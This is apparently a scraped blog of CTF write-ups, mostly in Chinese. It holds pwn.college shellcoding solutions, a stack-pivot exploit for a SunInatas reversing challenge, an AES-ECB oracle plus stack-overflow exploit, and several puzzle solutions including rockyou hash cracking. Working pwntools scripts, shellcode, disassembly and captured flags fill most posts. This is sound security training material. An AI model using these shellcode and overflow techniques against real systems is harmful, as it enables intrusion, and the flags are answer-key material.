0x000000002e692013 | cc                                            | int3
0x000000002e692014 | 47 04 2f                                      | add al, 0x2f

Executing shellcode!

[*] Got EOF while reading in interactive
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/clobbercode"

payload_asm = """
.intel_syntax noprefix

xor eax, eax
push rax
mov eax, 0x67616c66
jmp b2

.rept 10
nop
.endr

b2:
shl rax, 8
mov al, 0x2f
nop
nop
jmp b3

.rept 10
nop
.endr

b3:
push rax
push rsp
pop rdi
push 4
pop rsi
nop
nop
jmp b4

.rept 10
nop
.endr

b4:
push 90
pop rax
syscall
"""

payload = asm(payload_asm)
log.info(f"Generated Payload Size: {len(payload)} bytes")

p = process(target_binary)
p.send(payload)
p.wait()

import os
os.system("cat /flag")
pwn.college{QOtrCvTfAfczjbdUxqvPYGKqWTY.0VNyIDL4cjM1gzW}

Diverse Delivery

Write and execute shellcode to read the flag, but every byte in your input must be unique.

1
2
3
4
5
6
7
8
9
10
11
12
hacker@program-security~diverse-delivery:~$ /challenge/diverse-delivery ###
### Welcome to /challenge/diverse-delivery!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x237a3000!
Reading 0x1000 bytes from stdin.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/env python3
from pwn import *

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/diverse-delivery"

# 20 bytes of pure unique perfection
payload_asm = """
.intel_syntax noprefix
    movabs rbx, 0x02010067616c662f
    push rbx
    push rsp
    pop rdi
    push 0x3f
    pop rsi
    mov al, 90
    syscall
"""

payload = asm(payload_asm)

unique_bytes = set(payload)

p = process(target_binary)
p.send(payload)
p.wait()

import os
os.system("cat /flag")
pwn.college{k-QnO4vkMzyh_61th5kjPIrt_UL.0FOyIDL4cjM1gzW}

Pocket Payload

Write and execute shellcode to read the flag, but this time you only get 12 bytes!

1
2
3
4
5
6
7
8
9
10
11
12
hacker@program-security~pocket-payload:~$ /challenge/pocket-payload
###
### Welcome to /challenge/pocket-payload!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x19902000!
Reading 0xc bytes from stdin.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/env python3
from pwn import *
import os

context.update(arch="amd64", os="linux")
context.log_level = "debug"

target_binary = "/challenge/pocket-payload"

payload_asm = """
.intel_syntax noprefix
    push rdx
    pop rdi
    push 0x3f
    pop rsi
    mov al, 90
    syscall
"""

payload = asm(payload_asm).ljust(12, b"\x90")

log.info(f"Payload (also our symlink name): {payload}")

try:
    os.remove(payload)
except OSError:
    pass

os.symlink(b"/flag", payload)

p = process(target_binary)
p.send(payload)

p.wait()

os.system("cat /flag")

Micro Menace

Write and execute shellcode to read the flag, but this time you only get 6 bytes :)

1
2
3
4
5
6
7
8
9
10
11
12
hacker@program-security~micro-menace:~$ /challenge/micro-menace
###
### Welcome to /challenge/micro-menace!
###

This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them
as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will
practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing
other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.

Mapped 0x1000 bytes for shellcode at 0x19f00000!
Reading 0x6 bytes from stdin.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
            ; ICOD XREF from entry0 @ 0x1221(r)
┌ 655: int main (int argc, char **argv, char **envp);
│ `- args(rdi, rsi, rdx) vars(6:sp[0x10..0x40])
│           0x00001547      f30f1efa       endbr64
│           0x0000154b      55             push rbp
│           0x0000154c      4889e5         mov rbp, rsp
│           0x0000154f      4883ec40       sub rsp, 0x40
│           0x00001553      897ddc         mov dword [var_24h], edi    ; argc
│           0x00001556      488975d0       mov qword [var_30h], rsi    ; argv
│           0x0000155a      488955c8       mov qword [var_38h], rdx    ; envp
│           0x0000155e      488b05bb2a..   mov rax, qword [obj.stdin]  ; obj.stdin__GLIBC_2.2.5
│                                                                      ; [0x4020:8]=0
│           0x00001565      b900000000     mov ecx, 0                  ; size_t size
│           0x0000156a      ba02000000     mov edx, 2                  ; int mode
│           0x0000156f      be00000000     mov esi, 0                  ; char *buf
│           0x00001574      4889c7         mov rdi, rax                ; FILE*stream
│           0x00001577      e854fcffff     call sym.imp.setvbuf        ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│           0x0000157c      488b058d2a..   mov rax, qword [obj.stdout] ; obj.__TMC_END__
│                                                                      ; [0x4010:8]=0
│           0x00001583      b900000000     mov ecx, 0                  ; size_t size
│           0x00001588      ba02000000     mov edx, 2                  ; int mode
│           0x0000158d      be00000000     mov esi, 0                  ; char *buf
│           0x00001592      4889c7         mov rdi, rax                ; FILE*stream
│           0x00001595      e836fcffff     call sym.imp.setvbuf        ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│           0x0000159a      488d3d240c..   lea rdi, [0x000021c5]       ; "###" ; const char *s
│           0x000015a1      e88afbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015a6      488b45d0       mov rax, qword [var_30h]
│           0x000015aa      488b00         mov rax, qword [rax]
│           0x000015ad      4889c6         mov rsi, rax
│           0x000015b0      488d3d120c..   lea rdi, str._Welcome_to__s__n ; 0x21c9 ; "### Welcome to %s!\n" ; const char *format
│           0x000015b7      b800000000     mov eax, 0
│           0x000015bc      e8affbffff     call sym.imp.printf         ; int printf(const char *format)
│           0x000015c1      488d3dfd0b..   lea rdi, [0x000021c5]       ; "###" ; const char *s
│           0x000015c8      e863fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015cd      bf0a000000     mov edi, 0xa                ; int c
│           0x000015d2      e849fbffff     call sym.imp.putchar        ; int putchar(int c)
│           0x000015d7      488d3d020c..   lea rdi, str.This_challenge_reads_in_some_bytes__modifies_them__depending_on_the_specific_challenge_configuration___and_executes_them ; 0x21e0 ; "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them" ; const char *s
│           0x000015de      e84dfbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015e3      488d3d760c..   lea rdi, str.as_code__This_is_a_common_exploitation_scenario__called__code_injection_._Through_this_series_of_challenges__you_will ; 0x2260 ; "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will" ; const char *s
│           0x000015ea      e841fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015ef      488d3de20c..   lea rdi, str.practice_your_shellcode_writing_skills_under_various_constraints__To_ensure_that_you_are_shellcoding__rather_than_doing ; 0x22d8 ; "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing" ; const char *s
│           0x000015f6      e835fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000015fb      488d3d4e0d..   lea rdi, str.other_tricks__this_will_sanitize_all_environment_variables_and_arguments_and_close_all_file_descriptors___2._n ; 0x2350 ; "other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n" ; const char *s
│           0x00001602      e829fbffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001607      c745ec0300..   mov dword [fildes], 3
│       ┌─< 0x0000160e      eb0e           jmp 0x161e
│       │   ; CODE XREF from main @ 0x1625(x)
│      ┌──> 0x00001610      8b45ec         mov eax, dword [fildes]
│      ╎│   0x00001613      89c7           mov edi, eax                ; int fildes
│      ╎│   0x00001615      e886fbffff     call sym.imp.close          ; int close(int fildes)
│      ╎│   0x0000161a      8345ec01       add dword [fildes], 1
│      ╎│   ; CODE XREF from main @ 0x160e(x)
│      ╎└─> 0x0000161e      817dec0f27..   cmp dword [fildes], 0x270f  ; '\x0f\''
│      └──< 0x00001625      7ee9           jle 0x1610
│           0x00001627      488b45d0       mov rax, qword [var_30h]
│           0x0000162b      488945f0       mov qword [s], rax
│       ┌─< 0x0000162f      eb2b           jmp 0x165c
│       │   ; CODE XREF from main @ 0x1666(x)
│      ┌──> 0x00001631      488b45f0       mov rax, qword [s]
│      ╎│   0x00001635      488b00         mov rax, qword [rax]
│      ╎│   0x00001638      4889c7         mov rdi, rax                ; const char *s
│      ╎│   0x0000163b      e810fbffff     call sym.imp.strlen         ; size_t strlen(const char *s)
│      ╎│   0x00001640      4889c2         mov rdx, rax                ; size_t n
│      ╎│   0x00001643      488b45f0       mov rax, qword [s]
│      ╎│   0x00001647      488b00         mov rax, qword [rax]
│      ╎│   0x0000164a      be00000000     mov esi, 0                  ; int c
│      ╎│   0x0000164f      4889c7         mov rdi, rax                ; void *s
│      ╎│   0x00001652      e839fbffff     call sym.imp.memset         ; void *memset(void *s, int c, size_t n)
│      ╎│   0x00001657      488345f008     add qword [s], 8
│      ╎│   ; CODE XREF from main @ 0x162f(x)
│      ╎└─> 0x0000165c      488b45f0       mov rax, qword [s]
│      ╎    0x00001660      488b00         mov rax, qword [rax]
│      ╎    0x00001663      4885c0         test rax, rax
│      └──< 0x00001666      75c9           jne 0x1631
│           0x00001668      488b45c8       mov rax, qword [var_38h]
│           0x0000166c      488945f8       mov qword [var_8h], rax
│       ┌─< 0x00001670      eb2b           jmp 0x169d
│       │   ; CODE XREF from main @ 0x16a7(x)
│      ┌──> 0x00001672      488b45f8       mov rax, qword [var_8h]
│      ╎│   0x00001676      488b00         mov rax, qword [rax]
│      ╎│   0x00001679      4889c7         mov rdi, rax                ; const char *s
│      ╎│   0x0000167c      e8cffaffff     call sym.imp.strlen         ; size_t strlen(const char *s)
│      ╎│   0x00001681      4889c2         mov rdx, rax                ; size_t n
│      ╎│   0x00001684      488b45f8       mov rax, qword [var_8h]
│      ╎│   0x00001688      488b00         mov rax, qword [rax]
│      ╎│   0x0000168b      be00000000     mov esi, 0                  ; int c
│      ╎│   0x00001690      4889c7         mov rdi, rax                ; void *s
│      ╎│   0x00001693      e8f8faffff     call sym.imp.memset         ; void *memset(void *s, int c, size_t n)
│      ╎│   0x00001698      488345f808     add qword [var_8h], 8
│      ╎│   ; CODE XREF from main @ 0x1670(x)
│      ╎└─> 0x0000169d      488b45f8       mov rax, qword [var_8h]
│      ╎    0x000016a1      488b00         mov rax, qword [rax]
│      ╎    0x000016a4      4885c0         test rax, rax
│      └──< 0x000016a7      75c9           jne 0x1672
│           0x000016a9      41b900000000   mov r9d, 0                  ; size_t offset
│           0x000016af      41b800000000   mov r8d, 0                  ; int fd
│           0x000016b5      b922000000     mov ecx, 0x22               ; '\"' ; int flags
│           0x000016ba      ba07000000     mov edx, 7                  ; int prot
│           0x000016bf      be00100000     mov esi, sym._init          ; 0x1000 ; size_t length
│           0x000016c4      bf0000f019     mov edi, 0x19f00000         ; void*addr
│           0x000016c9      e892faffff     call sym.imp.mmap           ; void*mmap(void*addr, size_t length, int prot, int flags, int fd, size_t offset)
│           0x000016ce      4889056329..   mov qword [obj.shellcode], rax ; [0x4038:8]=0
│           0x000016d5      488b055c29..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x000016dc      483d0000f019   cmp rax, 0x19f00000
│       ┌─< 0x000016e2      741f           je 0x1703
│       │   0x000016e4      488d0dde0d..   lea rcx, obj.__PRETTY_FUNCTION__.25265 ; 0x24c9 ; "main" ; const char *function
│       │   0x000016eb      ba62000000     mov edx, 0x62               ; 'b' ; unsigned int line
│       │   0x000016f0      488d35c90c..   lea rsi, str._challenge_babyshell_level_14.c ; 0x23c0 ; "/challenge/babyshell-level-14.c" ; const char *file
│       │   0x000016f7      488d3de20c..   lea rdi, str.shellcode___void__0x19f00000 ; str.shellcode___void__0x19f00000
│       │                                                              ; 0x23e0 ; "shellcode == (void *)0x19f00000" ; const char *assertion
│       │   0x000016fe      e87dfaffff     call sym.imp.__assert_fail  ; void __assert_fail(const char *assertion, const char *file, unsigned int line, const char *function)
│       │   ; CODE XREF from main @ 0x16e2(x)
│       └─> 0x00001703      488b052e29..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x0000170a      4889c6         mov rsi, rax
│           0x0000170d      488d3dec0c..   lea rdi, str.Mapped_0x1000_bytes_for_shellcode_at__p__n ; str.Mapped_0x1000_bytes_for_shellcode_at__p__n
│                                                                      ; 0x2400 ; "Mapped 0x1000 bytes for shellcode at %p!\n" ; const char *format
│           0x00001714      b800000000     mov eax, 0
│           0x00001719      e852faffff     call sym.imp.printf         ; int printf(const char *format)
│           0x0000171e      488d3d0b0d..   lea rdi, str.Reading_0x6_bytes_from_stdin._n ; str.Reading_0x6_bytes_from_stdin._n
│                                                                      ; 0x2430 ; "Reading 0x6 bytes from stdin.\n" ; const char *s
│           0x00001725      e806faffff     call sym.imp.puts           ; int puts(const char *s)
│           0x0000172a      488b050729..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x00001731      ba06000000     mov edx, 6                  ; size_t nbyte
│           0x00001736      4889c6         mov rsi, rax                ; void *buf
│           0x00001739      bf00000000     mov edi, 0                  ; int fildes
│           0x0000173e      e86dfaffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)
│           0x00001743      488905e628..   mov qword [obj.shellcode_size], rax ; [0x4030:8]=0
│           0x0000174a      488b05df28..   mov rax, qword [obj.shellcode_size] ; [0x4030:8]=0
│           0x00001751      4885c0         test rax, rax
│       ┌─< 0x00001754      751f           jne 0x1775
│       │   0x00001756      488d0d6c0d..   lea rcx, obj.__PRETTY_FUNCTION__.25265 ; 0x24c9 ; "main" ; const char *function
│       │   0x0000175d      ba67000000     mov edx, 0x67               ; 'g' ; unsigned int line
│       │   0x00001762      488d35570c..   lea rsi, str._challenge_babyshell_level_14.c ; 0x23c0 ; "/challenge/babyshell-level-14.c" ; const char *file
│       │   0x00001769      488d3ddf0c..   lea rdi, str.shellcode_size___0 ; 0x244f ; "shellcode_size > 0" ; const char *assertion
│       │   0x00001770      e80bfaffff     call sym.imp.__assert_fail  ; void __assert_fail(const char *assertion, const char *file, unsigned int line, const char *function)
│       │   ; CODE XREF from main @ 0x1754(x)
│       └─> 0x00001775      488d3dec0c..   lea rdi, str.This_challenge_is_about_to_execute_the_following_shellcode:_n ; 0x2468 ; "This challenge is about to execute the following shellcode:\n" ; const char *s
│           0x0000177c      e8aff9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001781      488b15a828..   mov rdx, qword [obj.shellcode_size] ; [0x4030:8]=0
│           0x00001788      488b05a928..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x0000178f      4889d6         mov rsi, rdx                ; int64_t arg2
│           0x00001792      4889c7         mov rdi, rax                ; int64_t arg1
│           0x00001795      e84ffbffff     call sym.print_disassembly
│           0x0000179a      488d3d040d..   lea rdi, [0x000024a5]       ; const char *s
│           0x000017a1      e88af9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000017a6      488d3df90c..   lea rdi, str.Executing_shellcode__n ; 0x24a6 ; "Executing shellcode!\n" ; const char *s
│           0x000017ad      e87ef9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000017b2      488b057f28..   mov rax, qword [obj.shellcode] ; [0x4038:8]=0
│           0x000017b9      4889c2         mov rdx, rax
│           0x000017bc      b800000000     mov eax, 0
│           0x000017c1      ffd2           call rdx
│           0x000017c3      488d3df20c..   lea rdi, str._Goodbye_      ; 0x24bc ; "### Goodbye!" ; const char *s
│           0x000017ca      e861f9ffff     call sym.imp.puts           ; int puts(const char *s)
│           0x000017cf      b800000000     mov eax, 0
│           0x000017d4      c9             leave
└           0x000017d5      c3             ret

Solution: Two-stage shellcode

Stage 1 (6 bytes) 用 sys_read 把 Stage 2 读到可执行内存中:

1
2
3
4
5
6
.intel_syntax noprefix
    push rax   /* rax 进入 shellcode 时是 0,入栈 */
    pop rdi    /* rdi = 0 (stdin 的 fd) */
    push rdx   /* rdx 存着当前 shellcode 的内存基址 0x19f00000 */
    pop rsi    /* rsi = 0x19f00000 (我们要把新代码读到这块可执行内存里) */
    syscall    /* 触发系统调用 因为 rax 是 0,执行 sys_read */
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/env python3
import itertools
from pwn import *
import os

context.update(arch="amd64", os="linux")
context.log_level = "error"

target_binary = "/challenge/micro-menace"

stage ="""
.intel_syntax noprefix
    push rax
    pop rdi
    push rdx
    pop rsi
    syscall
"""

payload = asm(stage)

p = process(target_binary)
p.send(payload)

time.sleep(0.1)

# sys_read 从 0x19f00000 这个起始地址开始写入 Stage 2 数据, add 6 nop to cover the stage 1 data
stage2 = asm("nop;" * 6 + shellcraft.cat("/flag"))
p.send(stage2)

p.interactive()

Posted on In Disqus:

OSINT II

TIFFANY&Co.

Halloween Day 3 - Python Obfuscation

多层 zlib(base64(reverse())) 混淆,递归解包:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import base64
import re
import zlib

payload_bytes = b""  # <- 第一层 payload

layer = 1
while True:
    try:
        decoded = zlib.decompress(base64.b64decode(payload_bytes[::-1])).decode()
        match = re.search(r"b'([^']+)'|b\"([^\"]+)\"", decoded)
        if match:
            payload_bytes = (match.group(1) or match.group(2)).encode()
            layer += 1
        else:
            print(decoded)
            break
    except Exception:
        print(decoded)
        break

print(f"[*] Layer: {layer}")

最终明文是一个逐字符打印脚本,答案藏在变量里:zieltext = "Die Antwort lautet GRABREDE."

GRABREDE

Halloween Day 4 - Scream Cipher

1
ĀA̰Á AÂÃȀÁȂ A̦ÅÄ AȂÁ ĂÅÅẠẢÂA̋ A̮ÅȂ ẢÃ ȦĂÅÅA̱...

Scream Cipher (XKCD)BLOOD

Halloween Day 5 - Hex Colors

6 个弹孔的红色色值,取高位字节:

1
2
#670000 #650000 #660000 #610000 #680000 #720000
 67      65      66      61      68      72

from hex → gefahr

Halloween Day 6a - Base64

直接 base64 decode → Bein

Halloween Day 6b - Morse Code

... - .. .-. -...STIRB

Winter Day 1 - View Source

Ctrl+Shift+U 查看源码,答案在被雪覆盖的 <p> 标签中 → snowflake

Winter Day 2 - Base64

QXBlcmxhYXE=Aperlaaq

Winter Day 4 - Wham! Typos

歌词中混入了 prompt injection 和故意拼写错误,提取异常字母:

原文 应为 异常字母
beby baby e
A wrapped I wrapped A
Nor Now r
sowl soul w
rear year r
mover lover m

Earworm

Octopus

A human counts with 10 fingers, an octopus with 8 tentacles. The answer is octopus2471.

2471 (octal) → 1337

Brainfuck?

实际是 JSFuck,Node.js 中 console.log(/* code */) 执行即可。

Host

1
$ curl http://185.26.156.141

响应中 <kbd>aegir.uberspace.de</kbd> 即为答案。

Rockyou

前端 JS 校验 sha256(salt + value),rockyou 字典爆破:

1
2
3
4
5
6
7
8
9
10
11
from hashlib import sha256

salt = "3NL/usjb4vEg"
target = "9bcf0c8289a97d33021b4790659396d9f8af1085210d2186b8ec38efcdc31472"

with open("/path/to/rockyou.txt") as f:
    for line in f:
        word = line.strip()
        if sha256((salt + word).encode()).hexdigest() == target:
            print(word)
            break

Time Zones

Chameleon 插件修改浏览器时区为 UTC-10。

Free Fall

$$h = \frac{1}{2} g t^2 = \frac{1}{2} \times 9.81 \times 1.43^2$$

Treasure Hunt

  • The largest online encyclopedia → wikipedia
  • Delay to allow data to travel from one point to another → latency
  • A finite, unambiguous set of instructions → algorithm
  • A machine learning model inspired by the human brain’s structure → neural network

UTF-5

□ = 0, ■ = 1,5-bit 编码(1=A, 2=B, …):

编码 二进制 字母
□■■□□ 01100 12 L
□■■■■ 01111 15 O
□□□■■ 00011 3 C
□■□□□ 01000 8 H
□■□■■ 01011 11 K
□□□□■ 00001 1 A
■□□■□ 10010 18 R
■□■□□ 10100 20 T
□□■□■ 00101 5 E

LOCHKARTE

Alphabet - Control Characters

ASCII contains an alphabet of uppercase letters and one of lowercase letters. But there is also a third, which is used in this file.

控制字符 = 第 N 个字母,空格保持:

1
2
3
$ xxd a
00000000: 1420 2020 010e 2020 2020 2009 2020 2020  .   ..     .
00000010: 0e14 2020 0c0a                           ..  ..
字节 字母
0x14 20 T
0x01 1 A
0x0e 14 N
0x09 9 I
0x0e 14 N
0x14 20 T
0x0c 12 L

T _ _ _ A N _ _ _ _ _ I _ _ _ _ N T _ _ Lcontrol

Honey Morello - Zero-Width Steganography

文本中藏有 zero-width characters(U+200B = 0, U+200C = 1),每行提取后按 5-bit 解码:

1
2
3
4
5
6
7
8
9
for line in text.split("\n"):
    bits = ""
    for ch in line:
        if ch == "\u200b":
            bits += "0"
        elif ch == "\u200c":
            bits += "1"
    if bits and (val := int(bits, 2)):
        print(chr(96 + val), end="")

the answer is meme

Mental Arithmetic

15 道限时算术题,JS 自动填充:

1
2
3
4
5
for (let i = 0; i < 15; i++) {
  let task = document.getElementById("task" + i).innerText.replace("=", "").trim();
  document.getElementById("ans" + i).value = eval(task);
}
document.forms[0].submit();

Base4096

Emoji 编解码:https://base4096.infinityfreeapp.com/?i=1

Transposed - Rail Fence Cipher

Rail Fence Cipher decode, key = 4

Posted on In Disqus:

challenges

Game 20

1
reverseme: ELF 32-bit LSB executable, Intel i386, statically linked, not stripped

Source

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
int __cdecl main(int argc, const char **argv, const char **envp)
{
  _BYTE s[30]; // [ebp-2Eh]
  int v5;      // [ebp-34h] BYREF
  unsigned int v7;

  if ( argc > 1 || strcmp(*argv, "./suninatas") )  // 必须重命名为 suninatas
    return 0;
  // 清空所有环境变量
  for ( i = 0; envp[i]; ++i )
    for ( j = 0; j < strlen(envp[i]); ++j )
      envp[i][j] = 0;

  _isoc99_scanf("%30s", s);
  v7 = Base64Decode(s, &v5);
  if ( v7 <= 0xC )  // 解码后最多 12 字节
  {
    memcpy(&input, v5, v7);  // 拷贝到 BSS 段全局变量 input
    if ( auth(v7) == 1 )
      correct();
  }
}

_BOOL4 __cdecl auth(int a1)
{
  _BYTE v2[8]; // [ebp-14h]
  char *s2;    // [ebp-Ch]
  int v4;      // [ebp-8h] BYREF  <-- 关键:距 saved ebp 仅 8 字节

// buffer overflow
  memcpy(&v4, &input, a1);  // 12 字节拷贝:8 字节填满 v4,4 字节溢出覆盖 saved ebp
  s2 = (char *)calc_md5((int)v2, 12);
  return strcmp("f87cd601aa7fedca99018a8be88eda34", s2) == 0;
}

void __noreturn correct()
{
  if ( input == 0xDEADBEEF )
    IO_puts("Congratulation! you are good!");
  exit(0);
}

Analysis

限制条件:

  • 文件必须重命名为 suninatasstrcmp(*argv, "./suninatas")
  • Base64 解码后最多 12 字节,无法直接覆盖 return address(需要 12+4=16 字节)

Stack Pivot

authv4 位于 [ebp-8h]memcpy 拷入 12 字节时:

1
2
3
4
[ebp-8h] v4       ← bytes 0-3
[ebp-4h]          ← bytes 4-7
[ebp+0h] saved ebp ← bytes 8-11  (被覆盖!)
[ebp+4h] ret addr  ← 无法触及

虽然无法直接控制 return address,但可以控制 saved ebp,利用 leave; ret 的链式效应实现栈迁移:

  1. authleave 恢复了被篡改的 ebp 给 main
  2. main 结束时执行 leavemov esp, ebp; pop ebp)— esp 被迁移到 &input
  3. main 执行 ret — 从 &input + 4 弹出值作为 EIP

Payload 结构

12 字节 = 3 个 DWORD(little-endian):

Offset 作用
0-3 0xDEADBEEF mainpop ebp 读取,同时满足 correct()input == 0xDEADBEEF
4-7 &correct (0x0804925f) mainret 弹入 EIP
8-11 &input (0x0811c9ec) 覆盖 auth 的 saved ebp,触发栈迁移

Exploit

获取地址(statically linked,地址固定):

1
2
3
$ objdump -t ./suninatas | grep -E ' (correct|input)$'
0811c9ec g     O .bss   0000000d input
0804925f g     F .text  00000031 correct

生成 payload:

1
2
python -c "import base64, struct; print(base64.b64encode(struct.pack('<III', 0xDEADBEEF, 0x0804925f, 0x0811c9ec)).decode())"
****************

because

1
memcpy(&input, v5, v7);  // 拷贝到 BSS 段全局变量 input

&input + 0 (前 4 字节): 0xDEADBEEF

&input + 4 (中 4 字节): 0x0804925f (&correct 的绝对地址)

&input + 8 (后 4 字节): 0x0811c9ec (&input 的绝对地址)

1
memcpy(&v4, &input, a1);  // 12 字节拷贝:8 字节填满 v4,4 字节溢出覆盖 saved ebp

[ebp-8] 到 [ebp-5]: 填入 0xDEADBEEF

[ebp-4] 到 [ebp-1]: 填入 0x0804925f

[ebp+0] 到 [ebp+3]: 填入 0x0811c9ec (&input) <-saved ebp

when auth calls leave; ret to return to main

mov esp, ebp: esp = ebp -> &input

pop ebp: esp -> ebp + 4 = &input + 4 and put 0xDEADBEEF into ebp

ret (pop eip): eip -> esp = &input + 4 = 0x0804925f = &correct

at &correct check input == 0xDEADBEEF

1
2
3
4
$ ./suninatas
Authenticate : ****************
hash : d932bf2657c20fd638787756d680c95c
Congratulation! you are good!
776t3l+SBAjsyREI

Posted on In Disqus:

同 easy 版本的 dispatch oracle 和 ECB block-by-block 加密策略,区别在于没有 stack dump 提示,需要手动逆向 offset。

Analysis

1
r2 -A -q -c "pdf @ sym.challenge; pdf @ sym.win" /challenge/vulnerable-overflow

关键溢出点:

1
2
3
4
5
6
; plaintext struct 起始于 s1 = rbp - 0x60
│           0x0040173b      lea rsi, [s1]           ; rbp - 0x60
; message buffer = s1 + 0x10 (跳过 8 字节 header + 8 字节 length)
│           0x0040173f      add rsi, 0x10           ; rbp - 0x50
; buffer overflow: 无长度限制
│           0x00401749      call sym.imp.EVP_DecryptUpdate
  • message buffer 起始于 rbp - 0x50
  • saved rbp 在 rbp + 0x00,saved rip 在 rbp + 0x08
  • offset = 0x50 + 0x08 = 88 bytes

sym.win 地址:

1
2
│           0x004013b6      endbr64
│           0x004013be      lea rdi, str.You_win__Here_is_your_flag:

win() = 0x4013b6

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/env python3
from Crypto.Util.Padding import pad
from pwn import *

context.log_level = "info"

# 0x50 (buffer to rbp) + 0x08 (saved rbp) = 88
OFFSET = 88
WIN_ADDR = 0x4013b6


def encrypt_block(block_data):
    p = process(["/challenge/dispatch"], level="error")
    p.send(block_data)
    p.shutdown("send")
    ct = p.recvall()
    p.close()
    return ct[16:32]


def build_payload():
    p_init = process(["/challenge/dispatch"], level="error")
    p_init.send(b"A" * 16)
    p_init.shutdown("send")
    first_block_ct = p_init.recvall()[:16]
    p_init.close()

    raw_payload = b"A" * OFFSET + p64(WIN_ADDR)
    padded_payload = pad(raw_payload, 16)

    final_ct = first_block_ct
    for i in range(0, len(padded_payload), 16):
        final_ct += encrypt_block(padded_payload[i : i + 16])

    log.success(f"Payload length: {len(final_ct)} bytes")
    return final_ct


def exploit():
    payload = build_payload()
    target = process("/challenge/vulnerable-overflow")
    target.send(payload)
    target.shutdown("send")
    print(target.recvall().decode(errors="ignore"))


if __name__ == "__main__":
    exploit()

Posted on In Disqus:

Concepts used: Cryptography + Binary Exploitation

Source

vulnerable-overflow 读取密文,先解密第一个 block 验证 header 和 length,再解密剩余 block 到栈上固定大小的 message[60]。因为 ciphertext_len 没有上限检查,EVP_DecryptUpdate 会直接造成栈溢出。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
int challenge(int argc, char **argv, char **envp)
{
    unsigned char key[16];
    struct
    {
        char header[8];
        unsigned long long length;
        char message[60];
    } plaintext = {0};

    // ... key init, read ciphertext from stdin ...

    // verify first block
    EVP_DecryptUpdate(ctx, (char *)&plaintext, &decrypted_len, ciphertext, 16);
    assert(memcmp(plaintext.header, "VERIFIED", 8) == 0);
    assert(plaintext.length <= 16);

    // buffer overflow: no bounds check on ciphertext_len
    EVP_DecryptUpdate(ctx, plaintext.message, &decrypted_len,
                      ciphertext + 16, ciphertext_len - 16);
}

dispatch 是加密 oracle,接受最多 16 字节的 message,拼上 VERIFIED header 后用相同 key 的 AES-ECB 加密输出:

1
2
3
4
5
6
7
8
key = open("/challenge/.key", "rb").read()
cipher = AES.new(key=key, mode=AES.MODE_ECB)

message = sys.stdin.buffer.read1()
assert len(message) <= 16, "Your message is too long!"
plaintext = b"VERIFIED" + struct.pack(b"<Q", len(message)) + message
ciphertext = cipher.encrypt(pad(plaintext, cipher.block_size))
sys.stdout.buffer.write(ciphertext)
